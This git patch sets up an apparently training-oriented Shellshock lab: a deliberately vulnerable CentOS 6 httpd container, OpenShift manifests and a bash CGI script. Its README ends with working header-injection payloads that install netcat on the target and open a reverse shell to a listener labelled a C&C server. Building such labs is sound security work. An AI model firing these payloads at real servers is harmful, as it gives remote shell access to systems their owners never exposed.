From 0a2893663f67e9eafe7e1f7eb05eae0522a0f670 Mon Sep 17 00:00:00 2001 From: Nicolas MASSE Date: Fri, 30 Apr 2021 18:44:46 +0200 Subject: [PATCH] initial commit --- shellshock/Dockerfile | 5 ++ shellshock/README.md | 83 +++++++++++++++++++ shellshock/openshift/00-namespace.yaml | 10 +++ shellshock/openshift/10-deploy.yaml | 32 +++++++ shellshock/openshift/20-svc.yaml | 17 ++++ shellshock/openshift/30-route.yaml | 17 ++++ shellshock/rootfs/entrypoint.sh | 18 ++++ .../rootfs/etc/yum.repos.d/CentOS-Base.repo | 35 ++++++++ shellshock/rootfs/var/www/cgi-bin/hello.cgi | 5 ++ 9 files changed, 222 insertions(+) create mode 100644 shellshock/Dockerfile create mode 100644 shellshock/README.md create mode 100644 shellshock/openshift/00-namespace.yaml create mode 100644 shellshock/openshift/10-deploy.yaml create mode 100644 shellshock/openshift/20-svc.yaml create mode 100644 shellshock/openshift/30-route.yaml create mode 100755 shellshock/rootfs/entrypoint.sh create mode 100644 shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo create mode 100755 shellshock/rootfs/var/www/cgi-bin/hello.cgi diff --git a/shellshock/Dockerfile b/shellshock/Dockerfile new file mode 100644 index 0000000..cfc2d32 --- /dev/null +++ b/shellshock/Dockerfile @@ -0,0 +1,5 @@ +FROM vulnerable-centos:6 +COPY rootfs . +RUN yum install -y httpd +EXPOSE 80 443 +ENTRYPOINT ["/entrypoint.sh"] diff --git a/shellshock/README.md b/shellshock/README.md new file mode 100644 index 0000000..a86fb19 --- /dev/null +++ b/shellshock/README.md @@ -0,0 +1,83 @@ +# Shellshock vulnerable image + +## Build + +Old CentOS images are here: https://vault.centos.org/ + +Install it in a virtual machine. + +```sh +sudo virt-install --name centos6 --os-variant centos6.5 --memory 2048 --vcpus 2 --disk size=10,alias.name=centos6 --hvm --network network=default --cdrom /var/lib/libvirt/images/CentOS-6.5-x86_64-minimal.iso +``` + +Mount the qcow2 image as explained [here](https://gist.github.com/shamil/62935d9b456a6f9877b5). + +```sh +sudo qemu-nbd --connect=/dev/nbd0 /var/lib/libvirt/images/disk.qcow2 +sudo mount /dev/mapper/VolGroup-lv_root /mnt/ +sudo tar -cvf /tmp/centos6.tar . -C /mnt +sudo umount /mnt +sudo qemu-nbd --disconnect /dev/nbd0 +``` + +Create the container image. + +```sh +sudo podman import /tmp/centos6.tar vulnerable-centos:6 +sudo buildah bud -t vulnerable-httpd:centos-6 . +``` + +Push the image to the registry of your choice. + +```sh +sudo podman tag localhost/vulnerable-httpd:centos-6 registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6 +sudo podman push registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6 +``` + +## Usage + +```sh +sudo podman run -d --rm --name vulnerable-httpd vulnerable-httpd:centos-6 +POD_IP=$(sudo podman inspect --format "{{.NetworkSettings.IPAddress}}" vulnerable-httpd) +``` + +``` +sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi -H "X-Name: Nicolas" +Hello, Nicolas! +sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi +Hello, World! +``` + +## Deployment + +```sh +oc apply -f openshift/ +``` + +## Exploit + +Find the URL of the vulnerable CGI-BIN. + +```sh +export TARGET="https://$(oc get route frontend -n vulnerable-httpd -o jsonpath="{.spec.host}")/cgi-bin/hello.cgi" +``` + +Start a C&C server. + +```sh +sudo firewall-cmd --add-port 6666/tcp +nc -l -p 6666 +``` + +Set the IP address of the C&C server. + +```sh +export SERVER_IP=192.168.6.2 +``` + +Exploit the target. + +```sh +curl "$TARGET" -H "X-Name: () { :; }; /usr/bin/yum install -y nc" +curl "$TARGET" -H "X-Name: () { :; }; /bin/bash -i >& /dev/tcp/$SERVER_IP/6666 0>&1" +``` diff --git a/shellshock/openshift/00-namespace.yaml b/shellshock/openshift/00-namespace.yaml new file mode 100644 index 0000000..1637295 --- /dev/null +++ b/shellshock/openshift/00-namespace.yaml @@ -0,0 +1,10 @@ +apiVersion: v1 +kind: Namespace +metadata: + annotations: + openshift.io/description: "" + openshift.io/display-name: "" + name: vulnerable-httpd +spec: + finalizers: + - kubernetes diff --git a/shellshock/openshift/10-deploy.yaml b/shellshock/openshift/10-deploy.yaml new file mode 100644 index 0000000..60c852d --- /dev/null +++ b/shellshock/openshift/10-deploy.yaml @@ -0,0 +1,32 @@ +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: frontend + app.kubernetes.io/component: frontend + app.kubernetes.io/instance: frontend + name: frontend + namespace: vulnerable-httpd +spec: + replicas: 1 + selector: + matchLabels: + deployment: frontend + template: + metadata: + creationTimestamp: null + labels: + deployment: frontend + spec: + containers: + - image: registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6 + imagePullPolicy: IfNotPresent + name: frontend + resources: {} + terminationMessagePath: /dev/termination-log + terminationMessagePolicy: File + dnsPolicy: ClusterFirst + restartPolicy: Always + schedulerName: default-scheduler + securityContext: {} + terminationGracePeriodSeconds: 30 diff --git a/shellshock/openshift/20-svc.yaml b/shellshock/openshift/20-svc.yaml new file mode 100644 index 0000000..e1d595c --- /dev/null +++ b/shellshock/openshift/20-svc.yaml @@ -0,0 +1,17 @@ +apiVersion: v1 +kind: Service +metadata: + labels: + app: frontend + name: frontend + namespace: vulnerable-httpd +spec: + ports: + - name: http + port: 80 + protocol: TCP + targetPort: 80 + selector: + deployment: frontend + sessionAffinity: None + type: ClusterIP diff --git a/shellshock/openshift/30-route.yaml b/shellshock/openshift/30-route.yaml new file mode 100644 index 0000000..c648e9e --- /dev/null +++ b/shellshock/openshift/30-route.yaml @@ -0,0 +1,17 @@ +apiVersion: route.openshift.io/v1 +kind: Route +metadata: + labels: + app: frontend + name: frontend + namespace: vulnerable-httpd +spec: + port: + targetPort: http + tls: + termination: edge + to: + kind: Service + name: frontend + weight: 100 + wildcardPolicy: None diff --git a/shellshock/rootfs/entrypoint.sh b/shellshock/rootfs/entrypoint.sh new file mode 100755 index 0000000..98cc91a --- /dev/null +++ b/shellshock/rootfs/entrypoint.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Stop the scrip on any error encountered +set -Eeuo pipefail + +# Start a test instance of apache +/usr/sbin/apachectl -k start +sleep 2 + +# Run a test query +curl -s http://localhost/cgi-bin/hello.cgi -H "X-Name: OpenShift" + +# Stop apache +/usr/sbin/apachectl -k stop +sleep 2 + +# Run the real apache +exec /usr/sbin/httpd -X diff --git a/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo b/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo new file mode 100644 index 0000000..f4bfa19 --- /dev/null +++ b/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo @@ -0,0 +1,35 @@ +[base] +name=CentOS-$releasever - Base +baseurl=https://vault.centos.org/6.5/os/$basearch/ +gpgcheck=1 +gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6 + +#released updates +[updates] +name=CentOS-$releasever - Updates +baseurl=http://vault.centos.org/6.5/updates/$basearch/ +gpgcheck=1 +gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6 + +#additional packages that may be useful +[extras] +name=CentOS-$releasever - Extras +baseurl=http://vault.centos.org/6.5/extras/$basearch/ +gpgcheck=1 +gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6 + +#additional packages that extend functionality of existing packages +[centosplus] +name=CentOS-$releasever - Plus +baseurl=http://vault.centos.org/6.5/centosplus/$basearch/ +gpgcheck=1 +enabled=0 +gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6 + +#contrib - packages by Centos Users +[contrib] +name=CentOS-$releasever - Contrib +baseurl=http://vault.centos.org/6.5/contrib/$basearch/ +gpgcheck=1 +enabled=0 +gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6 \ No newline at end of file diff --git a/shellshock/rootfs/var/www/cgi-bin/hello.cgi b/shellshock/rootfs/var/www/cgi-bin/hello.cgi new file mode 100755 index 0000000..d69d336 --- /dev/null +++ b/shellshock/rootfs/var/www/cgi-bin/hello.cgi @@ -0,0 +1,5 @@ +#!/bin/sh + +echo "Content-Type: text/plain" +echo +echo "Hello, ${HTTP_X_NAME:-World}!"